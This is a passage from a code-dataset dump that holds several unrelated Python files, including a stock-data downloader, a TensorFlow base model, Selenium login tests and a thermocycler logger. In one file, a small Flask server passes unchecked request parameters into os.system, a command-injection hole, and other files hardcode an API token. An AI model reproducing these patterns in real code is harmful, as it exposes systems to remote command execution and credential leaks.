df\n\nimport config.TradingPlatformConfig as TradingPlatformConfig\nfrom utils.Constants import EQUITIES_COLUMNS\nfrom utils.TradingPlatformUtils import parseDate, equities_composite_hash\n\nconfiguration = TradingPlatformConfig.Configuration()\n\nBACKUP_DATA_SOURCE = configuration.base_directory + \"/backup_data_source\"\n\nurllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)\nhdr = {\n 'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',\n 'Accept-Charset': 'ISO-8859-1,utf-8;q=0.7,*;q=0.3',\n 'Accept-Encoding': 'none',\n 'Accept-Language': 'en-US,en;q=0.8',\n 'Connection': 'keep-alive'}\n\n\ndef get_equities_daily_file_dump_url(trade_date):\n year = trade_date.strftime(\"%Y\")\n month = (trade_date.strftime(\"%b\")).upper()\n day = trade_date.strftime(\"%d\")\n return \"https://nseindia.com/content/historical/EQUITIES/\" + year + \"/\" + month + \"/\" + \"cm\" + day + month + year + \"bhav.csv.zip\"\n\n\ndef get_equities_daily_file_dump_name(trade_date):\n year = trade_date.strftime(\"%Y\")\n month = (trade_date.strftime(\"%b\")).upper()\n day = trade_date.strftime(\"%d\")\n return \"cm\" + day + month + year + \"bhav.csv\"\n\n\ndef download_daily_file_dump(url):\n r = requests.get(url, stream=True)\n z = zipfile.ZipFile(StringIO.StringIO(r.content))\n z.extractall(BACKUP_DATA_SOURCE)\n\n\ndef transform_equities_quote(equities_quote, trade_date):\n processed_quote = pd.Series(index=EQUITIES_COLUMNS)\n open = equities_quote[\"OPEN\"]\n lastPrice = equities_quote[\"LAST\"]\n previous_close = equities_quote[\"PREVCLOSE\"]\n high = equities_quote[\"HIGH\"]\n low = equities_quote[\"LOW\"]\n close = equities_quote[\"CLOSE\"]\n volume = equities_quote[\"TOTTRDQTY\"]\n deliveredToTraded = np.NaN\n stock = str(equities_quote[\"SYMBOL\"].values[0])\n diff = (lastPrice - open) / previous_close\n range = (high - low) / open\n processed_quote[\"Diff\"] = diff\n processed_quote[\"PreviousClose\"] = previous_close\n processed_quote[\"OpenPrice\"] = open\n processed_quote[\"HighPrice\"] = high\n processed_quote[\"LowPrice\"] = low\n processed_quote[\"LastPrice\"] = lastPrice\n processed_quote[\"ClosePrice\"] = close\n processed_quote[\"Volume\"] = volume\n processed_quote[\"DeliveredToTraded\"] = deliveredToTraded\n processed_quote[\"ScriptName\"] = stock\n processed_quote[\"TradeDate\"] = trade_date\n processed_quote[\"EquitiesHash\"] = equities_composite_hash(trade_date, stock)\n return processed_quote\n\n\nclass BackupEquitiesDataLoad:\n trade_date = \"\"\n equities_data = df()\n\n def __init__(self, trade_date):\n self.trade_date = parseDate(trade_date)\n daily_dump_url = get_equities_daily_file_dump_url(self.trade_date)\n download_daily_file_dump(daily_dump_url)\n file_name = BACKUP_DATA_SOURCE + \"/\" + get_equities_daily_file_dump_name(self.trade_date)\n self.equities_data = pd.read_csv(file_name)\n\n def get_equities_quote(self, script_name):\n equities_quote = self.equities_data[self.equities_data[\"SYMBOL\"].isin([(script_name)])]\n equities_quote = equities_quote[equities_quote[\"SERIES\"].isin([(\"EQ\")])]\n return transform_equities_quote(equities_quote, str(self.trade_date))\n\n def delete_downloaded_file(self):\n file_name = BACKUP_DATA_SOURCE + \"/\" + get_equities_daily_file_dump_name(self.trade_date)\n if os.path.isfile(file_name):\n os.remove(file_name)\n","sub_path":"data_load/BackupEquitiesDataLoad.py","file_name":"BackupEquitiesDataLoad.py","file_ext":"py","file_size_in_byte":3681,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1331024","text":"def gcdIter(a, b):\n higher = a\n lower = b\n if b > a:\n higher = b\n lower = a\n astart = higher\n score = 1\n\n while score > 0:\n mod = b % astart\n mod2 = a % astart\n score = mod + mod2\n astart -= 1\n return astart + 1\n","sub_path":"_edX MiT/week 2 (Simple Programs)/4. Functions/gcd-iter.py","file_name":"gcd-iter.py","file_ext":"py","file_size_in_byte":275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"567300039","text":"# Get velocity field from the JHUTDB\n\n# The velocity fields are filtered and then the exact SGS stresses, the\n# filtered viscous stresses, and the Smagorinsky SGS stresses are calculated.\n\n# The filtered velocity fields saved are wider than the stresses because the\n# boundaries are needed in the nonlocal integration. The stresses have the same\n# horizontal dimensions as those that will be calculated nonlocally.\n\n# import modules\nimport numpy as np\nimport pyJHTDB\nimport scipy.signal\nimport models\nimport sys\n\n# Initialize and add token\nauth_token = \"edu.jhu.pato-ca56ca00\" \nlJHTDB = pyJHTDB.libJHTDB()\nlJHTDB.initialize()\nlJHTDB.add_token(auth_token)\n\n# Dimensions\ndims = 3\nvisc_length = 1.0006e-3\ndt = 0.0065\ndx = 8*np.pi/2048\ndz = 3*np.pi/1536 \ncut_dims = [64,8,64]\nNx = 64\nNy = 8\nNz = 64\ny0 = 239\nz0 = 1\nx0 = 1024\nxe = x0 + Nx - 1\nye = y0 + Ny - 1 \nze = z0 + Nz - 1\n\n# Iterate through snapshots\nfor tidx in range(150):\n x0p = x0 - round(0.45*dt*tidx/dx)\n xep = xe - round(0.45*dt*tidx/dx)\n\n # Get velocity field (unfiltered)\n velocity = lJHTDB.getbigCutout(\n data_set = 'channel',\n fields='u',\n t_start=tidx+1,\n t_end=tidx+1,\n start = np.array([x0p, y0, z0], dtype = np.int),\n end = np.array([xep, ye, ze], dtype = np.int),\n step = np.array([1, 1, 1], dtype = np.int),\n filter_width = 1)\n\n # Make the shape of velocity equal to (dims,Nx,Ny,Nz)\n velocity = np.transpose(velocity)\n\n # Save\n np.save('data/velos.{:02}.npy'.format(tidx), velocity)\n\n # Get the pressure field (unfiltered)\n velocity = lJHTDB.getbigCutout(\n data_set = 'channel',\n fields='p',\n t_start=tidx+1,\n t_end=tidx+1,\n start = np.array([x0p, y0, z0], dtype = np.int),\n end = np.array([xep, ye, ze], dtype = np.int),\n step = np.array([1, 1, 1], dtype = np.int),\n filter_width = 1)\n\n # Make the shape of velocity equal to (dims,Nx,Ny,Nz)\n velocity = np.transpose(velocity)\n\n # Save\n np.save('data/press.{:02}.npy'.format(tidx), velocity)\n","sub_path":"tf1/dns/get_data.py","file_name":"get_data.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"277985127","text":"from django import forms\r\nfrom django.core.files.base import ContentFile \r\nfrom slugify import slugify\r\nfrom urllib import request\r\nfrom .models import Image\r\n\r\n# header={\r\n# 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',\r\n# \"referer\":\"https://image.baidu.com\"\r\n# }\r\n\r\n\r\nclass ImageForm(forms.ModelForm):\r\n class Meta: \r\n model = Image\r\n fields = ('title', 'url', 'description')\r\n\r\n def clean_url(self):\r\n url = self.cleaned_data['url']\r\n valid_extensions = ['jpg', 'jpeg', 'png']\r\n extension = url.rsplit('.', 1)[1].lower()\r\n if extension not in valid_extensions:\r\n raise forms.ValidationError(\"The given Url does not match valid image extension.\")\r\n return url\r\n \r\n def save(self, force_insert=False, force_update=False, commit=True):\r\n image = super(ImageForm, self).save(commit=False)\r\n\r\n image_url = self.cleaned_data['url']\r\n # rep=request.Request(image_url,headers=header)\r\n\r\n image_name = '{0}.{1}'.format(slugify(image.title), image_url.rsplit('.', 1)[1].lower()) \r\n response = request.urlopen(image_url)\r\n image.image.save(image_name, ContentFile(response.read()), save=False)\r\n if commit:\r\n image.save() \r\n \r\n return image","sub_path":"mybbs/image/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"493956919","text":"from flask import Flask, request\nimport os\nfrom flask_cors import CORS\n\n\n\napp = Flask(__name__)\nCORS(app, resources=r'/*')\n\n\n@app.route('/')\ndef hello_world():\n return 'hello world'\n\n\n@app.route('/item', methods=['GET'])\ndef item():\n name = request.args.get(\"item\")\n\n print('name= -------> ', name)\n os.system(\"python run.py -i {}\".format(name))\n return 'welcome ' + name\n\n\n@app.route('/gvalue', methods=['GET'])\ndef gvalue():\n val = request.args.get(\"value\")\n print('value= ------>', val)\n os.system(\"python run.py -v {}\".format(val))\n return 'get your val' + val\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=8888, debug=False)\n","sub_path":"pythonfiles/flask-get-scripts/hello/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"481162247","text":"import tensorflow as tf\nimport numpy as np\nfrom .standard_layers import StandardLayers\ntf.logging.set_verbosity(tf.logging.ERROR)\ntf.set_random_seed(4)\nnp.random.seed(4)\n\n\nclass Base(StandardLayers):\n '''\n Base model featuring useful Tensorflow utilities.\n '''\n\n def __init__(self, sess, config, logger):\n '''\n Initiate base model.\n Args:\n - sess: tf.Session().\n - config: module with model config.\n - logger: custom logger handler.\n '''\n\n self.sess = sess\n self.config = config\n self.saver = None\n self.logger = logger\n self.model_name = \"default.model\"\n self.global_step = tf.Variable(0,\n dtype=tf.int32,\n trainable=False,\n name='global_step')\n\n def initialize(self):\n '''\n Initializes model.\n Builds model -> starts summary writer -> global vars init.\n '''\n\n self.logger.debug('Initializing model...')\n self.build_model()\n\n self.logger.debug('Model built. Initializing model writer...')\n self.train_writer = tf.summary.FileWriter(self.config.GRAPHS_TRAIN_DIR,\n self.sess.graph)\n self.test_writer = tf.summary.FileWriter(self.config.GRAPHS_TEST_DIR,\n self.sess.graph)\n\n self.logger.debug('Writer initialized. Initializing TF graph...')\n self.var_init = tf.global_variables_initializer()\n self.var_init.run()\n self.logger.debug('TF graph initialized.')\n\n self.logger.info('Model initialized.')\n\n def save(self, global_step=None):\n '''\n Save the current variables in graph.\n Optional option to save for global_step (used in Train).\n '''\n\n self.logger.debug('Saving model...')\n if self.saver is None:\n self.logger.debug('Saver not initiated, creating new model Saver.')\n self.saver = tf.train.Saver(tf.global_variables())\n\n if global_step is None:\n self.saver.save(self.sess,\n self.config.CHECKPOINTS_DIR + self.model_name)\n self.logger.debug('Saved with no global step.')\n else:\n self.saver.save(self.sess,\n self.config.CHECKPOINTS_DIR + self.model_name,\n global_step=self.global_step)\n self.logger.debug('Saved with global step.')\n\n self.logger.info('Model saved.')\n\n def restore(self, resume=True):\n '''\n Restore TF computation graph from saved checkpoint.\n Args:\n - resume (bool): resume last checkpoint or restore standard\n save file.\n '''\n\n self.logger.debug('Restoring model...')\n\n if self.saver is None:\n self.logger.debug('Saver not initiated, creating new model Saver.')\n self.saver = tf.train.Saver(tf.global_variables())\n\n if resume:\n self.logger.debug('Resume enabled. Finding newest model checkpoint.')\n\n ckpt = tf.train.latest_checkpoint(self.config.CHECKPOINTS_DIR)\n if ckpt:\n self.logger.debug('Model checkpoint found. Restoring...')\n self.saver.restore(self.sess, ckpt)\n self.logger.info('Model restored. Resuming from checkpoint.')\n return True\n else:\n self.logger.error('Resume enabled but no model checkpoints found. \\\n \\n Terminating...')\n raise ValueError()\n else:\n self.logger.debug('Resume disabled. Restoring from default save...')\n self.saver.restore(\n self.sess, self.config.CHECKPOINTS_DIR + self.model_name)\n self.logger.info('Model restored.')\n\n def train(self, X, Y, test_X, test_Y):\n '''\n Run model training. Model must have been initialized.\n Args:\n X (np.arr): featured data. Assuming len(X) > batch size.\n Y (np.arr): labels. Assuming len(Y) > batch size.\n '''\n\n self.logger.info('Starting model training...')\n\n for j in range(self.config.ITERATIONS):\n for i in range(0, len(X) + 1 - self.config.BATCH_SIZE,\n self.config.BATCH_SIZE):\n feed_dict = {\n self.x: X[i:i + self.config.BATCH_SIZE],\n self.target: Y[i:i + self.config.BATCH_SIZE]\n }\n _, train_acc, train_loss, train_summary = self.sess.run(\n [self.optim, self.acc, self.loss, self.summary_op],\n feed_dict=feed_dict)\n\n # Save every 10 iterations\n if j % 10 == 0:\n self.save(self.global_step)\n\n if j % 1 == 0:\n # Report training\n self.logger.info(\"Epoch: \" + str(j) + \" has train loss: \" +\n str(float(train_loss)) + \" and train accuracy: \" +\n str(float(train_acc)))\n self.train_writer.add_summary(train_summary, global_step=j)\n\n # Report test\n feed_dict = {\n self.x: test_X[:self.config.BATCH_SIZE],\n self.target: test_Y[:self.config.BATCH_SIZE]\n }\n test_acc, test_loss, test_summary = self.sess.run(\n [self.acc, self.loss, self.summary_op],\n feed_dict=feed_dict)\n self.logger.info(\"Epoch: \" + str(j) + \" has test loss: \" +\n str(float(test_loss)) + \" and test accuracy: \" +\n str(float(test_acc)))\n self.test_writer.add_summary(test_summary, global_step=j)\n\n self.logger.info('Model finished training!')\n\n def predict(self, X):\n '''\n Predict classifications for new inputs.\n Args:\n X (np.arr): featured data. Assuming len(X) > batch size.\n Note that left over data from batching are\n NOT calculated. So pad batches beforehand.\n Returns:\n predictions (list of np.arr): flat list of predictions.\n '''\n\n self.logger.info('Starting model predictions...')\n predictions = []\n for i in range(0, len(X) + 1 - self.config.BATCH_SIZE,\n self.config.BATCH_SIZE):\n feed_dict = {\n self.x: X[i:i + self.config.BATCH_SIZE]\n }\n predictions += list(self.sess.run([self.prediction],\n feed_dict=feed_dict)[0])\n self.logger.info('Model finished predicting!')\n return np.array(predictions)\n\n def shuffle_and_partition(self, X, Y, n_test, n_val):\n '''\n Shuffle and partition input data.\n Args:\n - X (np.array): X data\n - Y (np.array): target to be shuffled in sync\n - n_test (int): number of test points\n - n_val (int): number of validation points\n Return:\n - result:\n {\"train\": {\"X\": np.arr, \"Y\": np.arr},\n \"test\": {\"X\": np.arr, \"Y\": np.arr},\n \"val\": {\"X\": np.arr, \"Y\": np.arr}}.\n '''\n\n n_train = X.shape[0] - n_test - n_val\n self.logger.debug('Shuffling and partitioning data...')\n\n self.logger.debug('Shuffling X, Y in sync...')\n p = np.random.permutation(X.shape[0])\n shuffled_X, shuffled_Y = X[p], Y[p]\n del(p)\n del(X)\n del(Y)\n self.logger.debug('Finished shuffling dataset.')\n\n # Structured as: [train, test, val]\n self.logger.debug('Partitioning with training size: ' + str(n_train) +\n ' test size: ' + str(n_test) + ' and val size: ' +\n str(n_val) + '...')\n self.logger.debug('First partitioning X...')\n train_X = shuffled_X[:n_train]\n test_X = shuffled_X[n_train:(n_train + n_test)]\n val_X = shuffled_X[(n_train + n_test):]\n del(shuffled_X)\n\n self.logger.debug('Finished partitioning X. Now partitioning Y...')\n train_Y = shuffled_Y[:n_train]\n test_Y = shuffled_Y[n_train:(n_train + n_test)]\n val_Y = shuffled_Y[(n_train + n_test):]\n del(shuffled_Y)\n self.logger.debug('Finished partitioning Y.')\n\n self.logger.info('Finished shuffling and partitioning.')\n\n uniques, counts = np.unique(np.argmax(train_Y, 1), return_counts=True)\n for i in range(len(uniques)):\n self.logger.debug(\n 'Class: ' + str(uniques[i]) + '; count: ' + str(counts[i]))\n\n return {\"train\": {\"X\": train_X, \"Y\": train_Y},\n \"test\": {\"X\": test_X, \"Y\": test_Y},\n \"val\": {\"X\": val_X, \"Y\": val_Y}}\n\n","sub_path":"Alpaca/src/model_base/base_model.py","file_name":"base_model.py","file_ext":"py","file_size_in_byte":8022,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"417349243","text":"import unittest\nfrom project.toolUtils.yamlUtils import Yaml\nfrom project.page.loginPage import LoginPage\nfrom project.toolUtils.getData import GetData\nfrom parameterized import parameterized\nimport warnings\nfrom selenium import webdriver\nfrom time import sleep\nfrom project.toolUtils.logUtils import log\nimport time\n\nlogfile = Yaml(\"./config/configFile.yaml\").readYaml()[\"logFiles\"][\"loginLog\"].format(time.strftime(\"%Y-%m-%d\"))\nlogger = log(logfile)\n\nconfigFile = Yaml(\"./config/configFile.yaml\").readYaml()\ntcPath = configFile[\"caseFiles\"][\"loginTC\"]\ngetObj = GetData(tcPath)\n\nbaseUrl = configFile[\"baseUrl\"]\nelementDict = Yaml(\"./config/elementLoc/loginEle.yaml\").readYaml()\n\nclass TestLogin(unittest.TestCase):\n\n global baseUrl\n global elementDict\n\n def setUp(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(30)\n self.baseUrl = baseUrl\n warnings.simplefilter(\"ignore\", ResourceWarning)\n\n @parameterized.expand(getObj.data())\n def testLogin(self,id, desc, dataDict, expected):\n driver = self.driver\n case = LoginPage(driver, self.baseUrl, elementDict, id, desc, dataDict)\n logger.msg(\"case: %s START!\" %desc, \"info\")\n if id == \"1\":\n case.pwLoginSucess()\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n elif id == \"2\":\n case.loginPhInc()\n # assert if error pops\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n assert (case.getText(expected[\"type\"], expected[\"value\"]) == expected[\"text\"])\n elif id == \"3\":\n case.loginSmsInc()\n # assert if error pops\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n assert (case.getText(expected[\"type\"], expected[\"value\"]) == expected[\"text\"])\n elif id == \"4\":\n case.loginPwInc()\n # assert if error pops\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n assert (case.getText(expected[\"type\"], expected[\"value\"]) == expected[\"text\"])\n else:\n case.logout()\n # assert if logout success\n assert (case.findElement(expected[\"type\"], expected[\"value\"]) != None)\n logger.msg(\"case: %s FINISHED!\" % desc, \"info\")\n sleep(3)\n\n def tearDown(self):\n self.driver.quit()\n\nif __name__ == '__main__':\n\n # testData = {\n # \"uri\":\"/\",\n # \"iframeLoc\":(By.XPATH, \"//div[@class='login']/iframe\"),\n # \"wayOfLoc\":(By.CLASS_NAME, \"account-tab-account\"),\n # \"usernameLoc\":(By.ID, \"username\"),\n # \"passwordLoc\":(By.ID, \"password\"),\n # \"username\": \"15122888806\",\n # \"password\": \"huanhuan350881\",\n # \"submitLoc\":(By.LINK_TEXT, \"登录豆瓣\")\n # }\n # inData = {\"username\": \"15122888806\",\"password\": \"huanhuan350881\"}\n # filepath = \"../config/loginEle.yaml\"\n\n unittest.main()\n","sub_path":"project/case/testLogin.py","file_name":"testLogin.py","file_ext":"py","file_size_in_byte":2982,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"281743351","text":"import serial\nimport csv\nimport time\nimport threading\nfrom argparse import ArgumentParser\n\n#---------------------------------------#\nTOTAL_RUNS = 250\nGCODES = True\nTC_GCODE_ROUNDING_PRECISION = 2\n\nCOVER_TEMP = 105\nPLATE_TEMP_PRE = 10\nPLATE_TEMP_HOLD_1 = (94, 180)\n# Following temp durations have been increased by 10 sec to accommodate for ramp time\nPLATE_TEMP_REPEAT = [(94, 20), (70, 40), (72, 40)]\nPLATE_TEMP_HOLD_2 = (72, 300)\nPLATE_TEMP_POST = 4\nCYCLES = 29\n#---------------------------------------#\n\nBAUDRATE = 115200\nGCODES = {\n 'OPEN_LID': 'M126',\n 'CLOSE_LID': 'M127',\n 'GET_LID_STATUS': 'M119',\n 'SET_LID_TEMP': 'M140',\n 'GET_LID_TEMP': 'M141',\n 'DEACTIVATE_LID_HEATING': 'M108',\n 'EDIT_PID_PARAMS': 'M301',\n 'SET_PLATE_TEMP': 'M104',\n 'GET_PLATE_TEMP': 'M105',\n 'SET_RAMP_RATE': 'M566',\n 'DEACTIVATE': 'M18',\n 'DEVICE_INFO': 'M115'\n}\n\nSERIAL_ACK = '\\r\\n'\n\nPROTOCOL_STEPS = [\n\t'{} S{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_PRE, SERIAL_ACK),\t# 0\n\t'{} S{}{}'.format(GCODES['SET_LID_TEMP'], COVER_TEMP, SERIAL_ACK),\t\t# 1\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_HOLD_1[0], PLATE_TEMP_HOLD_1[1], SERIAL_ACK),\t\t# 2\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_REPEAT[0][0], PLATE_TEMP_REPEAT[0][1], SERIAL_ACK),# 3\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_REPEAT[1][0], PLATE_TEMP_REPEAT[1][1], SERIAL_ACK),# 4\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_REPEAT[2][0], PLATE_TEMP_REPEAT[2][1], SERIAL_ACK),# 5\n\t'{} S{} H{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_HOLD_2[0], PLATE_TEMP_HOLD_2[1], SERIAL_ACK),\t\t# 6\n\t'{}{}'.format(GCODES['DEACTIVATE_LID_HEATING'], SERIAL_ACK),\t\t\t\t# 7\n\t'{} S{}{}'.format(GCODES['SET_PLATE_TEMP'], PLATE_TEMP_POST, SERIAL_ACK)\t# 8\n\t]\nGCODE_DEBUG_PRINT_MODE = 'M111 cont{}'.format(SERIAL_ACK)\nGET_STAT = 'stat{}'.format(SERIAL_ACK)\nDEACTIVATE = '{}{}'.format(GCODES['DEACTIVATE'], SERIAL_ACK)\n\ndef build_arg_parser():\n\targ_parser = ArgumentParser(\n\t\tdescription=\"Thermocycler temperature data logger\")\n\targ_parser.add_argument(\"-P\", \"--module_port\", required=True)\n\targ_parser.add_argument(\"-F\", \"--csv_file_name\", required=True)\n\treturn arg_parser\n\ndef _send(ser, lock, cmd):\n\twith lock:\n\t\tprint(\"Sending: {}\".format(cmd))\n\t\tser.write(cmd.encode())\n\ndef parse_number_from_substring(substring, rounding_val):\n\t'''\n\tReturns the number in the expected string \"N:12.3\", where \"N\" is the\n\tkey, and \"12.3\" is a floating point value\n\n\tFor the temp-deck or thermocycler's temperature response, one expected\n\tinput is something like \"T:none\", where \"none\" should return a None value\n\t'''\n\ttry:\n\t\tvalue = substring.split(':')[1]\n\t\tif value.strip().lower() == 'none':\n\t\t\treturn None\n\t\treturn round(float(value), rounding_val)\n\texcept (ValueError, IndexError, TypeError, AttributeError):\n\t\tprint('Unexpected argument to parse_number_from_substring:')\n\t\traise Exception(\n\t\t\t'Unexpected argument to parse_number_from_substring: {}'.format(substring))\n\n\ndef parse_key_from_substring(substring) -> str:\n\t'''\n\tReturns the axis in the expected string \"N:12.3\", where \"N\" is the\n\tkey, and \"12.3\" is a floating point value\n\t'''\n\ttry:\n\t\treturn substring.split(':')[0]\n\texcept (ValueError, IndexError, TypeError, AttributeError):\n\t\tprint('Unexpected argument to parse_key_from_substring:')\n\t\traise Exception(\n\t\t\t'Unexpected argument to parse_key_from_substring: {}'.format(substring))\n\n\ndef run_protocol(ser, lock):\n\tfor run_x in range(TOTAL_RUNS):\n\t\tprint(\"****** Run #{} *******\".format(run_x))\n\t\t_send(ser, lock, PROTOCOL_STEPS[0])\t# Plate PRE\n\t\t_send(ser, lock, PROTOCOL_STEPS[1])\t# Lid temp\n\t\ttime.sleep(150)\t # Takes approx 5 minutes for lid to heat\n\t\t_send(ser, lock, PROTOCOL_STEPS[2])\t# First point\n\t\ttime.sleep(PLATE_TEMP_HOLD_1[1])\n\t\tfor i in range(CYCLES):\n\t\t\t_send(ser, lock, PROTOCOL_STEPS[3])\t# First repeat\n\t\t\ttime.sleep(PLATE_TEMP_REPEAT[0][1])\n\t\t\t_send(ser, lock, PROTOCOL_STEPS[4])\t# Second repeat\n\t\t\ttime.sleep(PLATE_TEMP_REPEAT[1][1])\n\t\t\t_send(ser, lock, PROTOCOL_STEPS[5])\t# Last repeat\n\t\t\ttime.sleep(PLATE_TEMP_REPEAT[2][1])\n\t\t_send(ser, lock, PROTOCOL_STEPS[6])\t# Rest step\n\t\ttime.sleep(PLATE_TEMP_HOLD_2[1])\n\t\t_send(ser, lock, PROTOCOL_STEPS[7])\t# Lid stop\n\t\t_send(ser, lock, PROTOCOL_STEPS[8])\t# incubate\n\t\ttime.sleep(200)\n\t\tprint(\"******* Run #{} Completed *******\".format(run_x))\n\t_send(ser, lock, DEACTIVATE)\n\n\ndef record_status(filename, ser, lock):\n\t_send(ser, lock, GCODE_DEBUG_PRINT_MODE)\n\ttime.sleep(0.5)\n\tser.readline()\n\tser.readline()\n\twhile True:\n\t\twith lock:\n\t\t\tserial_line = ser.readline()\n\t\tif serial_line:\n\t\t\tserial_list = serial_line.decode().split(\"\\t\")\n\t\t\tserial_list = list(map(lambda x: x.strip(), serial_list))\n\t\t\tdata_res = {}\n\t\t\tfor substr in serial_list:\n\t\t\t\tif substr == '':\n\t\t\t\t\tcontinue\n\t\t\t\tprint(substr,end =\"\\t\"),\n\t\t\t\tkey = parse_key_from_substring(substr)\n\t\t\t\tvalue = parse_number_from_substring(substr, TC_GCODE_ROUNDING_PRECISION)\n\t\t\t\tdata_res[key] = value\n\t\t\tprint()\n\t\t\tprint(\"---------------------\")\n\t\t\tstatus_list = []\n\t\t\tfor key, val in data_res.items():\n\t\t\t\tstatus_list.append(val)\n\t\t\twith open('{}.csv'.format(filename), mode='a') as data_file:\n\t\t\t\tdata_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t\t\t\tdata_writer.writerow(status_list)\n\t\ttime.sleep(0.1)\n\nif __name__ == '__main__':\n\targ_parser = build_arg_parser()\n\targs = arg_parser.parse_args()\n\tser = serial.Serial(args.module_port, baudrate=BAUDRATE, timeout=1)\n\tprint(\"Serial: {}\".format(ser))\n\ttime.sleep(1)\n\tfilename = args.csv_file_name\n\twith open('{}.csv'.format(filename), mode='w') as data_file:\n\t data_writer = csv.writer(data_file, delimiter=',', quotechar='\"', quoting=csv.QUOTE_MINIMAL)\n\t data_writer.writerow([\"Millis\", \"Plate target\", \"Cover target\", \"hold time\", \"therm1\", \"therm2\", \"therm3\", \"therm4\", \"therm5\", \"therm6\", \"heatsink\", \"loop duration\", \"fan\", \"auto fan?\", \"lid temp\", \"motor fault\"])\n\tlock = threading.Lock()\n\trecorder = threading.Thread(target=record_status, args=(filename, ser, lock), daemon=True)\n\tprotocol_writer = threading.Thread(target=run_protocol, args=(ser, lock))\n\trecorder.start()\n\ttime.sleep(5)\t# Just to record pre-protocol data\n\tprint(\"Starting protocol writer\")\n\tprotocol_writer.start()\n\tprotocol_writer.join()\n","sub_path":"arduino-modules/thermo-cycler/QC/lifetime_test/TC_datalogger.py","file_name":"TC_datalogger.py","file_ext":"py","file_size_in_byte":6260,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"84352236","text":"import os\nimport subprocess\n\n#datasets = ['_n_20_m_100000000', '_n_20_m_10000000', '_n_20_m_1000000', '_n_10_m_100000000', '_n_10_m_10000000', \n#'_n_10_m_1000000', '-a2_n_60_m_100000000', '-a2_n_60_m_10000000', '-a2_n_60_m_1000000']\ndatasets = ['_n_20_m_100000000', '_n_10_m_100000000', '-a2_n_60_m_100000000']\n\n\nfor dataset in datasets:\n prefix = ''\n if '-a2' in dataset:\n prefix = 'PL'\n \n #file = open(\"../datasets/strings{0}Input{1}.csv\".format(prefix, dataset))\n\n steps = [100,1000,10000, 100000, 1000000, 10000000]\n\n\n for i in steps:\n print(\"Dataset: \", dataset, \" - Lines: \", i)\n subprocess.Popen([\"powershell\",\"Get-Content ../datasets/strings{0}Test{1}.csv | select -First {2} | Out-File ../datasets/{2}_strings{0}Test{1}.csv\".format(prefix, dataset, i)])\n #os.system('powershell -NoProfile Get-Content ../datasets/strings{0}Input{1}.csv | powershell -NoProfile select -First {2} | powershell -NoProfile Out-File ../datasets/{2}_strings{0}Input{1}.csv'.format(prefix, dataset, i))","sub_path":"implementation/reduceDatasets.py","file_name":"reduceDatasets.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"362393364","text":"from matplotlib import pyplot as plt\n\nvariance = [2**x for x in range(10)]\nbias_squared = [2**x for x in range(9, -1, -1)]\ntotal_error = [x + y for x, y in zip(variance, bias_squared)]\nxs = [i for i, _ in enumerate(variance)]\n\nplt.plot(xs, variance, 'g-', label='variance')\nplt.plot(xs, bias_squared, 'r-.', label='bias^2')\nplt.plot(xs, total_error, 'b:', label='total error')\nplt.show()\n\n","sub_path":"data-science/chap3/line_charts.py","file_name":"line_charts.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323543929","text":"# Сортировка слиянием\n# слияние отсортированных массивов в один\n# Квазилинейное время, O(n log2 n)\n\n\ndef merge_sort(A: list):\n if len(A) > 1:\n middle = len(A) // 2\n left_half = A[:middle]\n right_half = A[middle:]\n\n merge_sort(left_half)\n merge_sort(right_half)\n\n i = k = j = 0\n\n while i < len(left_half) and j < len(right_half):\n if left_half[i] < right_half[j]:\n A[k] = left_half[i]\n i += 1\n else:\n A[k] = right_half[j]\n j += 1\n k += 1\n\n while i < len(left_half):\n A[k] = left_half[i]\n i += 1\n k += 1\n\n while j < len(right_half):\n A[k] = right_half[j]\n j += 1\n k += 1\n return A\n","sub_path":"merge_sort.py","file_name":"merge_sort.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"573296728","text":"#! /usr/local/bin/python3\n\n# loadSFAccountTeam.py\n# Parse All Clients CSV with Python and SQLite\n# Copyright 